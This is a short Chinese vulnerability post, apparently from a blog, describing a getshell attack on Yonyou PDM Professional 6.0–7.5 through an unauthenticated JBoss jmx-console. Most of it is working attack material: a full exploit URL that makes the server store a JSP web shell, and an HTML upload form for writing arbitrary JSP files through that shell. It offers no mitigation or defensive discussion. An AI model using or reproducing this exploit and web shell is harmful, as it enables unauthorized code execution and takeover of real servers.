用友PDM Professional全版本通用型配置不当导致getshell

主要是JBOSS造成的问题
jboss未授权访问导致getshell

http://url/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=upload5warn.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25+if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b+%25%3e&argType=boolean&arg4=True

以上访问会生成一个这样的路径文件“/upload5warn/shell.jsp”

<html>

<head>

<meta http-equiv="content-type" content="text/html;charset=utf-8">

<title>jsp-test</title>

</head>

<style>

.main{width:980px;height:600px;margin:0 auto;}

.url{width:300px;}

.fn{width:60px;}

.content{width:80%;height:60%;}

</style>

<script>

  function upload(){

    var url = document.getElementById('url').value,

      content = document.getElementById('content').value,

      fileName = document.getElementById('fn').value,

      form = document.getElementById('fm');

    if(url.length == 0){

      alert("Url not allowd empty!");

      return ;

    }

    if(content.length == 0){

      alert("Content not allowd empty!");

      return ;

    }

    if(fileName.length == 0){

      alert("FileName not allowd empty!");

      return ;

    }

    form.action = url;

    form.submit();

  }

</script>

<body>

<div class="main">

  <form id="fm" method="post">  

    URL:<input type="text" value="http://url/upload5warn/shell.jsp" class="url" id="url" />  

    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  

    <a href="javascript:upload();">Upload</a><br/>

    <textarea id="content" class="content" name="t" ></textarea>

  </form>

</div>

</body>

</html>

涉及:
用友PDM Professional 7.5
用友PDM Professional 6.5SP1
用友PDM Professional 7.2
用友PDM Professional 7.0
用友PDM Professional 6.0

发表评论